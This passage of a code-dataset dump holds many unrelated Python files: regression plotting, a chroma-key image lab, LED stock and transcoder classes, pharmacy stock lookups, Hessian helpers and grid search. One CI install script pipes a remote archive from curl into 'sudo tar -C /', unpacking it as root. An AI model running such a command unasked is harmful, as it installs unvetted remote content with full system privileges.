tensorflow cariables \ninit = tf.initialize_all_variables()\nsess = tf.Session()\nsess.run(init)\n\n# display w and b combinations in the model\nfor step in range(16):\n sess.run(train)\n print(step, sess.run(W), sess.run(b))\n plt.plot(x_data, y_data, 'ro')\n plt.plot(x_data, sess.run(W) * x_data + sess.run(b))\n plt.xlabel('x')\n plt.xlim(-2,2)\n plt.ylim(0.1,0.6)\n plt.ylabel('y')\n plt.legend()\n plt.show()\n","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"644487282","text":"# copy image to blank\r\ndef pyCopy(source, target, targetX, targetY):\r\n width = getWidth(source)\r\n height = getHeight(source)\r\n for x in range(0, width):\r\n for y in range(0, height):\r\n pix = getPixel(source, x, y)\r\n mypix = getPixel(target, targetX + x, targetY + y)\r\n setColor(mypix, getColor(pix))\r\n show(target)\r\n return target\r\n\r\n# get the picture in chromakey image to new image\r\ndef chromakey(pic, backgroundPicture):\r\n\r\n # get width of chromekey picture\r\n width = getWidth(pic)\r\n height = getHeight(pic)\r\n\r\n # loop \r\n for x in range(0, width):\r\n for y in range(0, height):\r\n\r\n # get color of rgb of chromekey picture\r\n red = getRed(getPixel(pic, x, y))\r\n green = getGreen(getPixel(pic, x, y))\r\n blue = getBlue(getPixel(pic, x, y))\r\n\r\n # conditional check for green to replace with pixel from backgroundPicture\r\n if green > 250 or (green > 225 and red > 0 and blue > 0 and red < 200 and blue < 200):\r\n setColor(getPixel(pic, x, y), getColor(getPixel(backgroundPicture, x, y)))\r\n elif green > 80 and red > 0 and red < 80 and blue > 0 and blue < 80:\r\n setColor(getPixel(pic, x, y), getColor(getPixel(backgroundPicture, x, y)))\r\n \r\n return pic\r\n\r\n# add text to picture at x and y\r\ndef addTextToPicture(picture):\r\n # text\r\n text = \"Happy Thanksgiving!\"\r\n # adding text to picture\r\n addTextWithStyle(picture, 200, 50, text, makeStyle(serif, bold, 50), makeColor(255, 165, 0))\r\n return picture\r\n\r\ndef makeThanksgivingCard():\r\n \r\n # make a blank picture of 852 by 480 pixels\r\n blankPaper = makeEmptyPicture(852, 480)\r\n\r\n # copy background into blank picture\r\n newImage = pyCopy(makePicture(pickAFile()), blankPaper, 0, 0)\r\n # adding chromakey into picture\r\n newImage = chromakey(makePicture(pickAFile()), newImage)\r\n newImage = chromakey(makePicture(pickAFile()), newImage)\r\n # adding text to picture\r\n newImage = addTextToPicture(newImage)\r\n\r\n # save picture to directory\r\n writePictureTo(newImage, 'C:/Users/lisec/OneDrive/Documents/CST 205/Lab 7/card.png')","sub_path":"CST205/Lab 7/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"598745495","text":"#!/usr/bin/env python\n\nimport ci_lib\n\nbatches = [\n [\n 'docker pull %s' % (ci_lib.image_for_distro(ci_lib.DISTRO),),\n ],\n [\n 'curl https://dw.github.io/mitogen/binaries/ubuntu-python-2.4.6.tar.bz2 | sudo tar -C / -jxv',\n ]\n]\n\nci_lib.run_batches(batches)\n","sub_path":".ci/mitogen_py24_install.py","file_name":"mitogen_py24_install.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130189451","text":"# Returns the margin to be used in \"character\"\n\n# length. 1 point = 1/72 inch\n\ndef CalculateMargin(inch_margin, point_size):\n\n return inch_margin * (72 // point_size)\n\n\n\n# Checks whether the word is at the end of a \n\n# sentence or not.\n\ndef _CheckWord(word):\n\n if (word.endswith('.') or word.endswith('?') or word.endswith('!')):\n\n return True\n\n else:\n\n return False\n\n\n\n# Handles outputting the line (that is taken \n\n# in as a list of split words). Returns the \n\n# char counter. \n\ndef HandleLine(line, char_count, char_limit, left_margin, output_file):\n\n for word in line:\n\n if (len(word) > char_limit):\n\n print(\"ERROR: WORD LENGTH MORE THAN MARGIN DEFINED.\")\n\n return -1\n\n if (char_count + len(word) > char_limit):\n\n print()\n\n output_file.write('\\n')\n\n for num_char in range(left_margin):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n print(word, end='')\n\n output_file.write(word)\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count = len(word) + 1\n\n else:\n\n print(word, end='')\n\n output_file.write(word)\n\n char_count += len(word)\n\n if (char_count + 1 > char_limit):\n\n print()\n\n output_file.write('\\n')\n\n for num_char in range(left_margin):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count = 1\n\n else:\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count += 1\n\n if (_CheckWord(word)):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count += 1\n\n return char_count\n","sub_path":"Prog1/margin_maker.py","file_name":"margin_maker.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"320613546","text":"import LEDBinCode\n\nimport sys\nimport os\nsys.path.append(os.path.abspath((os.path.join(os.path.dirname(__file__), \"../Observer_Observable/\"))))\nimport Observable\n\nclass LEDStock(Observable.Observable):\n\t\"\"\"A LED stock is a set of LED represented by their LED bin code.\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Initialize the LED stock.\"\"\"\n\t\tsuper(LEDStock, self).__init__()\n\t\tself.stock = {}\n\t\tself.remaining = 0\n\n\tdef __repr__(self):\n\t\t\"\"\"Return a string formated representation of the LED stock.\"\"\"\n\t\tres = \"\\n\".format(self.remaining)\n\t\tfor key in self.stock.keys():\n\t\t\tres += \"{0} : {1}\\n\".format(key, self.stock[key])\n\t\treturn res + \"\"\n\n\tdef __getitem__(self, key):\n\t\t\"\"\"Get the number of LED having the same LED bin code.\"\"\"\n\t\tif not (isinstance(key, LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type.\")\n\t\ttry:\n\t\t\treturn self.stock[key]\n\t\texcept KeyError:\n\t\t\treturn 0\n\n\tdef __setitem__(self, key, nb):\n\t\t\"\"\"Put some LED having the same LED bin code in the stock.\"\"\"\n\t\tif not (isinstance(key, LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type.\")\n\t\tif not (isinstance(nb, int)):\n\t\t\traise TypeError(\"Unsuported right operand type.\")\n\t\tif (nb<0) :\n\t\t\traise ValueError(\"Unsuported negative value.\")\n\t\tself.remaining += (nb-self.stock[key] if (key in self) else nb)\n\t\tself.stock[key] = nb\n\n\tdef __contains__(self, bin):\n\t\t\"\"\"Check if the LED Bin already exists in the stock.\"\"\"\n\t\treturn bin in self.stock\n\n\tdef __iter__(self):\n\t\t\"\"\"Get the current iterator of led Dict\"\"\"\n\t\treturn self.stock.__iter__()\n\n\tdef __len__(self):\n\t\treturn len(self.stock)\n\n\tdef listBin(self):\n\t\t\"\"\"Returns all keys of stock\"\"\"\n\t\treturn self.stock.keys()\n\n\tdef copy(self):\n\t\t\"\"\"Create a copy of the LED Stock instance.\"\"\"\n\t\tres = LEDStock()\n\t\tres.stock = self.stock.copy()\n\t\tres.remaining = self.remaining\n\t\tres.observers = self.observers\n\t\treturn res\n\n\tdef getRemaining(self):\n\t\t\"\"\"Get the remaining LED stock size.\"\"\"\n\t\treturn self.remaining\n\n\tdef generateRandomStock(self, width):\n\t\t\"\"\"Generate a random stock of LED.\"\"\"\n\t\tself.stock.clear()\n\t\tself.remaining = width\n\t\tfor i in range(width):\n\t\t\trandomLEDBinCode = LEDBinCode.LEDBinCode.createRandomLEDBin()\n\t\t\tif randomLEDBinCode in self:\n\t\t\t\tself.stock[randomLEDBinCode] += 1\n\t\t\telse:\n\t\t\t\tself.stock[randomLEDBinCode] = 1\n\n\tdef pickOne(self, key):\n\t\t\"\"\"Remove a LED in the stock.\"\"\"\n\t\t# print(\"pickOne\")\n\t\tif not (isinstance(key,LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type\")\n\t\tself[key] -= 1\n\t\tself.remaining -= 1\n\t\tif self[key]==0:\n\t\t\tself.stock.pop(key)\n\t\tself.notifyObservers(key)\n\n\tdef add(self, key):\n\t\t# print(\"add\")\n\t\tif not (isinstance(key,LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type\")\n\t\ttry :\n\t\t\tself.stock[key] += 1\n\t\texcept KeyError:\n\t\t\tself.stock[key] = 1\n\t\tself.remaining += 1\n\t\tself.notifyObservers(key)","sub_path":"LED/Model/LEDStock.py","file_name":"LEDStock.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"243477106","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/postlund/pyatv_dev/pyatv/pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage_pb2.py\n# Compiled at: 2019-09-30 07:18:14\n# Size of source mod 2**32: 4740 bytes\nimport sys\n_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode('latin1'))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n_sym_db = _symbol_database.Default()\nfrom pyatv.mrp.protobuf import ProtocolMessage_pb2 as pyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage.proto',\n package='',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=(_b('\\n;pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage.proto\\x1a(pyatv/mrp/protobuf/ProtocolMessage.proto\"{\\n\"SendPackedVirtualTouchEventMessage\\x12\\x0c\\n\\x04data\\x18\\x01 \\x01(\\x0c\"G\\n\\x05Phase\\x12\\t\\n\\x05Began\\x10\\x01\\x12\\t\\n\\x05Moved\\x10\\x02\\x12\\x0e\\n\\nStationary\\x10\\x03\\x12\\t\\n\\x05Ended\\x10\\x04\\x12\\r\\n\\tCancelled\\x10\\x05:a\\n\"sendPackedVirtualTouchEventMessage\\x12\\x10.ProtocolMessage\\x18/ \\x01(\\x0b2#.SendPackedVirtualTouchEventMessage')),\n dependencies=[\n pyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.DESCRIPTOR])\nSENDPACKEDVIRTUALTOUCHEVENTMESSAGE_FIELD_NUMBER = 47\nsendPackedVirtualTouchEventMessage = _descriptor.FieldDescriptor(name='sendPackedVirtualTouchEventMessage',\n full_name='sendPackedVirtualTouchEventMessage',\n index=0,\n number=47,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=True,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE = _descriptor.EnumDescriptor(name='Phase',\n full_name='SendPackedVirtualTouchEventMessage.Phase',\n filename=None,\n file=DESCRIPTOR,\n values=[\n _descriptor.EnumValueDescriptor(name='Began',\n index=0,\n number=1,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Moved',\n index=1,\n number=2,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Stationary',\n index=2,\n number=3,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Ended',\n index=3,\n number=4,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Cancelled',\n index=4,\n number=5,\n serialized_options=None,\n type=None)],\n containing_type=None,\n serialized_options=None,\n serialized_start=157,\n serialized_end=228)\n_sym_db.RegisterEnumDescriptor(_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE = _descriptor.Descriptor(name='SendPackedVirtualTouchEventMessage',\n full_name='SendPackedVirtualTouchEventMessage',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(name='data',\n full_name='SendPackedVirtualTouchEventMessage.data',\n index=0,\n number=1,\n type=12,\n cpp_type=9,\n label=1,\n has_default_value=False,\n default_value=(_b('')),\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)],\n extensions=[],\n nested_types=[],\n enum_types=[\n _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE],\n serialized_options=None,\n is_extendable=False,\n syntax='proto2',\n extension_ranges=[],\n oneofs=[],\n serialized_start=105,\n serialized_end=228)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE.containing_type = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\nDESCRIPTOR.message_types_by_name['SendPackedVirtualTouchEventMessage'] = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\nDESCRIPTOR.extensions_by_name['sendPackedVirtualTouchEventMessage'] = sendPackedVirtualTouchEventMessage\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\nSendPackedVirtualTouchEventMessage = _reflection.GeneratedProtocolMessageType('SendPackedVirtualTouchEventMessage', (_message.Message,), {'DESCRIPTOR':_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE, \n '__module__':'pyatv.mrp.protobuf.SendPackedVirtualTouchEventMessage_pb2'})\n_sym_db.RegisterMessage(SendPackedVirtualTouchEventMessage)\nsendPackedVirtualTouchEventMessage.message_type = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\npyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.ProtocolMessage.RegisterExtension(sendPackedVirtualTouchEventMessage)","sub_path":"pycfiles/pyatv-0.5.1-py3-none-any/SendPackedVirtualTouchEventMessage_pb2.cpython-36.py","file_name":"SendPackedVirtualTouchEventMessage_pb2.cpython-36.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199672484","text":"import requests\n\nfrom .url import URL\nfrom .payload import Payload\nfrom .result import Result\n\n\nclass Response:\n @staticmethod\n def get_target(zip_code, product_body, range_mi, silent_fail):\n try:\n ret = []\n product_id, product_name = product_body\n\n response = requests.get(URL.get_target(zip_code, product_id, range_mi)).json()\n for location in response[\"products\"][0][\"locations\"]:\n ret.append(Result(\n name=location[\"store_name\"],\n product_name=product_name,\n amount=int(location[\"location_available_to_promise_quantity\"]),\n distance=float(location[\"distance\"]),\n address=location[\"store_address\"].replace(\"\\n\", \"\")\n ))\n\n return ret\n except Exception as e:\n if silent_fail:\n return []\n else:\n raise e\n\n @staticmethod\n def get_walgreens(zip_code, product_body, silent_fail):\n try:\n ret = []\n product_id, product_name = product_body\n\n response = requests.post(\n URL.post_walgreens(),\n data=Payload.get_walgreens(zip_code, product_id)).json()\n print(response[\"summary\"])\n for location in response[\"results\"]:\n store = location[\"store\"]\n address_body = store[\"address\"]\n\n ret.append(Result(\n name=f'{store[\"name\"]} #{location[\"storeNumber\"]}',\n product_name=product_name,\n amount=int(location[\"inventory\"][\"inventoryCount\"]),\n distance=float(location[\"distance\"]),\n address=f'{address_body[\"street\"]}, {address_body[\"state\"]} {address_body[\"zip\"]}',\n time=f'{store[\"storeOpenTime\"]}~{store[\"storeCloseTime\"]}'\n ))\n\n return ret\n except Exception as e:\n if silent_fail:\n return []\n else:\n raise e\n","sub_path":"extutils/maskfinder/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16659959","text":"import numpy as np\nimport torch\n\n\ndef jacobian_in_batch(y, x):\n \"\"\" Computes the Jacobian matrix for batched data \"\"\"\n batch = y.shape[0]\n single_y_size = np.prod(y.shape[1:])\n y = y.view(batch, -1)\n vector = torch.ones(batch).to(y)\n\n jac = [\n torch.autograd.grad(\n y[:, i], x, grad_outputs=vector, retain_graph=True, create_graph=True\n )[0].view(batch, -1)\n for i in range(single_y_size)\n ]\n jac = torch.stack(jac, dim=1)\n\n return jac.detach()\n\n\ndef diagonal_hessian(y, xs):\n \"\"\" Determines the diagonal Hessian matrix, this isn't much faster then computing\n the full hessian but more memory efficient.\"\"\"\n assert y.numel() == 1\n if torch.is_tensor(xs):\n xs = [xs]\n diagonal_hessian = []\n # Compute hessian\n for x_i in xs:\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n ddx_i = torch.zeros(dx_i.numel())\n for i in range(x_i.numel()):\n ddx_ii = torch.autograd.grad(dx_i[i], x_i, retain_graph=True)[0].flatten()\n ddx_i[i] = ddx_ii[i].clone().detach()\n del ddx_ii\n diagonal_hessian += [ddx_i.reshape(x_i.shape)]\n del dx_i\n del ddx_i\n return diagonal_hessian\n\n\ndef block_diagonal_hessian(y, xs):\n \"\"\" Determines the block diagonal hessian.\"\"\"\n assert y.numel() == 1\n if torch.is_tensor(xs):\n xs = [xs]\n block_diagonal_hessian = []\n # Compute hessian\n for x_i in xs:\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n ddx_i = torch.zeros((dx_i.numel(), dx_i.numel()))\n for i in range(x_i.numel()):\n ddx_ii = torch.autograd.grad(dx_i[i], x_i, retain_graph=True)[0].flatten()\n ddx_i[i, :] = ddx_ii.clone().detach()\n del ddx_ii\n block_diagonal_hessian += [ddx_i]\n del dx_i\n del ddx_i\n return block_diagonal_hessian\n\n\ndef hessian(y, xs):\n \"\"\" Computes the full hessian matrix \"\"\"\n assert y.numel() == 1\n if torch.is_tensor(xs):\n xs = [xs]\n numel = sum([x.numel() for x in xs])\n hessian = torch.zeros((numel, numel))\n # Compute hessian\n row_idx = 0\n for i, x_i in enumerate(xs):\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n for j in range(x_i.numel()):\n ddx_ij = torch.autograd.grad(dx_i[j], xs[i:], retain_graph=True)\n ddx_ij = torch.cat([x.flatten() for x in ddx_ij])[j:]\n hessian[row_idx, row_idx:] += ddx_ij\n if row_idx + 1 < numel:\n hessian[row_idx + 1 :, row_idx] += ddx_ij[1:]\n del ddx_ij\n row_idx += 1\n del dx_i\n return hessian\n","sub_path":"pck1/sbi/vi/first_second_order_helpers.py","file_name":"first_second_order_helpers.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"419110315","text":"while True:\n four = input(\"Enter natural digits: \")\n if not four.isdigit() or int(four) < 0:\n print(\"Incorrect. Try again\")\n else:\n i = 1\n mul = int(four[0])\n while i < len(four):\n mul = mul*int(four[0+i])\n i = i + 1\n print(\"Mul: \",mul)\n print(\"Reverse: \",four.reverse())\n print(\"Sort: \",sorted(four))\n break","sub_path":"HW/HW2/HW_02_02.py","file_name":"HW_02_02.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"237876949","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 16 14:46:03 2017\n\n@author: Obelix\n\"\"\"\n\nimport os\nos.chdir(\"C:/Users/Obelix/Documents/Vachan_documents/Rosalind\")\n\nfile = open(\"rosalind_ini6.txt\", \"r\")\nline1 = file.readline().split()\nprint(line1)\nnu = 0;\ndict = {}\n\nfor word in line1:\n if word in dict:\n dict[word] += 1\n else:\n dict[word] = 1\n \nfor key, value in dict.items():\n print(key + str(\" \") + str(value))","sub_path":"Bioinformatics-Stronghold/untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"12839068","text":"from threading import Thread\nfrom ffmpy import FFmpeg\n\nimport mutagen\nfrom mutagen.oggvorbis import OggVorbis\nfrom mutagen.flac import FLAC\nfrom mutagen.mp3 import MP3\n\n\ndef _vorbis_tags(f):\n return {\n 'title': '; '.join(f.tags['title']),\n 'artist': '; '.join(f.tags['artist']),\n 'album': '; '.join(f.tags['album'])\n }\n\n\ndef _id3_tags(f):\n return {\n 'title': '; '.join(f.tags['TIT2']),\n 'artist': '; '.join(f.tags['TPE1']),\n 'album': '; '.join(f.tags['TALB'])\n }\n\n\nCODECS = {\n OggVorbis: _vorbis_tags,\n FLAC: _vorbis_tags,\n MP3: _id3_tags\n}\n\n\nclass IllegalCodecError(Exception):\n pass\n\n\ndef _get_tags(f):\n media_file = mutagen.File(str(f))\n codec = type(media_file)\n\n try:\n get_tags = CODECS[codec]\n except KeyError as e:\n raise IllegalCodecError from e\n else:\n tags = get_tags(media_file)\n\n return tags\n\n\ndef _run_ffmpeg(in_, out, exe='ffmpeg'):\n ff = FFmpeg(\n executable=exe,\n inputs={str(in_): None},\n outputs={str(out): [\n '-map', '0:0',\n '-f', 'ogg',\n '-c:a:0', 'libvorbis',\n '-q:a:0', '6'\n ]})\n ff.run()\n\n\ndef transcode(in_path, out_path, uuid, on_complete, delete=False):\n track = {uuid: _get_tags(in_path)}\n\n def worker():\n _run_ffmpeg(in_path, out_path)\n\n if delete:\n in_path.unlink()\n\n on_complete(track)\n\n t = Thread(target=worker)\n t.start()\n","sub_path":"airhead/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"450842782","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Wei, Shuowen\n\nhttps://leetcode.com/problems/minimum-ascii-delete-sum-for-two-strings/\n\nhttps://labuladong.gitee.io/algo/3/24/78/\nhttps://mp.weixin.qq.com/s/ZhPEchewfc03xWv9VP3msg\n\nLC53, LC1143, LC583, LC712, LC72, LC516\n\"\"\"\nclass Solution(object):\n def minimumDeleteSum(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: int\n \"\"\"\n dp_table = {}\n # // 定义:将 s1[i..] 和 s2[j..] 删除成相同字符串,最小的 ASCII 码之和为 dp(s1, i, s2, j)。\n def dp(s1, s2, i, j):\n if i == len(s1):\n return sum([ord(s2[k]) for k in range(j, len(s2))])\n if j == len(s2):\n return sum([ord(s1[k]) for k in range(i, len(s1))])\n if (i, j) in dp_table:\n return dp_table[(i,j)]\n \n if s1[i] == s2[j]:\n res = dp(s1, s2, i+1, j+1)\n else:\n res = min(dp(s1, s2, i, j+1) + ord(s2[j]), \n dp(s1, s2, i+1, j) + ord(s1[i]))\n dp_table[(i, j)] = res\n return res\n return dp(s1, s2, 0, 0)","sub_path":"Medium/LC712.py","file_name":"LC712.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"84902421","text":"#!/usr/bin/python3\n# To run from pkg root\n# python3 -m pkg.tools.edit-tag\n\nimport argparse\nimport codecs\nfrom datetime import datetime\nimport os\nimport shutil\nimport tempfile\n\nfrom pkg.common import util\n\nparser = argparse.ArgumentParser()\nparser.add_argument('workdir')\nparser.add_argument('oldtag')\nparser.add_argument('newtag')\nparser.add_argument('--safe', help='Only print expected changes.',\n action='store_true')\nargs = parser.parse_args()\n\nworkdir = os.path.join(os.getcwd(), args.workdir)\nprint('Running in %ssafe mode' % ('' if args.safe else 'un'))\nprint('Replacing %s tag with %s tag in %s' % (args.oldtag, args.newtag,\n workdir))\nfor (dirpath, dirnames, filenames)in os.walk(workdir):\n for note_file in filenames:\n note_file_path = os.path.join(dirpath, note_file)\n changed = False\n temp_handle, temp_file_path = tempfile.mkstemp()\n temp_file = os.fdopen(temp_handle, 'w')\n if not util.is_note_file(note_file):\n continue\n with codecs.open(note_file_path, 'r', 'utf-8') as curr_file:\n for line in curr_file:\n tag = util.search_tag(line)\n if tag == args.oldtag:\n temp_file.write(util.get_tag(args.newtag) + '\\n')\n changed = True\n else:\n temp_file.write(line)\n temp_file.close()\n if changed:\n print('Copying over %s' % (note_file_path))\n if not args.safe:\n shutil.copy(temp_file_path, note_file_path)\n # Have to do our own cleanup\n os.remove(temp_file_path)\n","sub_path":"pkg/tools/edit_tag.py","file_name":"edit_tag.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150530688","text":"class StateMachine:\n # states: list containing all possible states\n # transistions: list containing all possible transitions\n # initialstate: str equal to key of starting state\n def __init__(self,states,transitions,initialState):\n self.oldStateName = \"None\"\n self.currentStateName = initialState\n self.states = {}\n for state in states:\n self.states[state.name] = state\n self.transitions = {}\n for transistion in transitions:\n self.transitions[transistion.name] = transistion\n \n def __call__(self):\n self.checkTransitions()\n self.run()\n \n # This method should be called continously in a loop\n def run(self):\n currentState = self.states[self.currentStateName]\n # Run current State's loop function, if it exists\n if callable(currentState.loop): currentState.loop()\n\n # This method should be called continously in a loop\n # checks if each transition's trigger is true. If so, checks if current\n # state is in list of source states. if so, change state to corresponding\n # target state\n def checkTransitions(self):\n for transition in self.transitions:\n currentTransition = self.transitions[transition]\n if currentTransition.checkTrigger():\n for index,source in enumerate(currentTransition.sourceStates):\n if self.currentStateName == source.name:\n self.changeState(currentTransition.targetStates[index])\n break\n\n # call leave function, if any, switch to new State, call enter function, if any\n def changeState(self,newState):\n oldState = self.states[self.currentStateName]\n if callable(oldState.leave): oldState.leave()\n self.oldStateName = oldState.name\n self.currentStateName = newState.name\n \n newState = self.states[self.currentStateName]\n if callable(newState.enter): newState.enter()\n\n\nclass State:\n # name: str name of State\n # loop: func to run continuously while in given state\n # enter: func to run once upon entering state\n # leave: func to run once upon leaving state\n def __init__(self,name,loop=None,enter=None,leave=None):\n self.name = name\n self.loop = loop\n self.enter = enter\n self.leave = leave\n\n\nclass Transition:\n # name: str name of Transition\n # trigger: func to trigger transition. Should return Bool\n # sources: list of source State objects\n # targets: list of target State objects\n # sources and targets should be lists of equal size. elements that share an\n # index represent a source-destination pair\n def __init__(self, name,trigger,sources,targets):\n self.name = name\n self.getTrigger = trigger\n self.sourceStates = sources\n self.targetStates = targets\n\n def checkTrigger(self):\n return self.getTrigger()","sub_path":"stateMachine.py","file_name":"stateMachine.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"401694157","text":"from random import randrange\nfrom heapq import heappop, heappush\nfrom math import inf\n\ndirections = [\"U\", \"D\", \"L\", \"R\"]\n\ndef new_position_after_move(i, j, move):\n explore_i = i\n explore_j = j\n if move == \"U\":\n explore_i = i - 1\n elif move == \"D\":\n explore_i = i + 1\n elif move == \"L\":\n explore_j = j - 1\n elif move == \"R\":\n explore_j = j + 1\n return explore_i, explore_j\n\ndef bfs(grid, start_i, start_j, swags):\n grid_copy = [row[:] for row in grid]\n bfs_queue = [[start_i, start_j]]\n paths_and_swags = []\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([[ \"(\" + str(i) + \",\" + str(j) + \")\"], []])\n paths_and_swags.append(row)\n\n count = 0;\n while bfs_queue:\n i,j = bfs_queue.pop(0)\n grid_copy[i][j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(i, j, direction)\n\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, explore_j):\n new_paths = paths_and_swags[i][j][0] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n new_swags = paths_and_swags[i][j][1]\n\n if grid[explore_i][explore_j] in swags:\n item = grid[explore_i][explore_j]\n new_swags = paths_and_swags[i][j][1] + [ str(item)]\n\n paths_and_swags[explore_i][explore_j][0] = new_paths\n paths_and_swags[explore_i][explore_j][1] = new_swags\n bfs_queue.append([explore_i, explore_j])\n count += 1\n\n grid[i][j] = \"end\"\n return paths_and_swags, count\n\ndef dijkstras( grid, start_i, start_j):\n grid_copy = [row[:] for row in grid]\n paths_and_distances = []\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([inf, [ \"(\" + str(i) + \",\" + str(j) + \")\"]])\n paths_and_distances.append(row)\n paths_and_distances[start_i][start_j][0] = 0\n vertices_to_explore = [(0, start_i, start_j)]\n count = 0;\n\n while vertices_to_explore:\n current_distance, current_i, current_j = heappop(vertices_to_explore)\n grid_copy[current_i][current_j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(current_i, current_j, direction)\n new_distance = current_distance + 1\n new_path = paths_and_distances[current_i][current_j][1] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, explore_j) and new_distance < paths_and_distances[explore_i][explore_j][0]:\n paths_and_distances[explore_i][explore_j][0] = new_distance\n paths_and_distances[explore_i][explore_j][1] = new_path\n heappush(vertices_to_explore, (new_distance, explore_i, explore_j))\n count += 1\n\n return paths_and_distances, count\n\ndef is_out_of_grid(grid, explore_i, explore_j):\n return explore_i < 0 or explore_j < 0 or explore_i >= len(grid) or explore_j >= len(grid[0])\n\ndef is_this_cell_available(grid, grid_copy, explore_i, explore_j):\n return grid[explore_i][explore_j] != \"wall\" and grid_copy[explore_i][explore_j] != \"visited\"\n\n\n# using 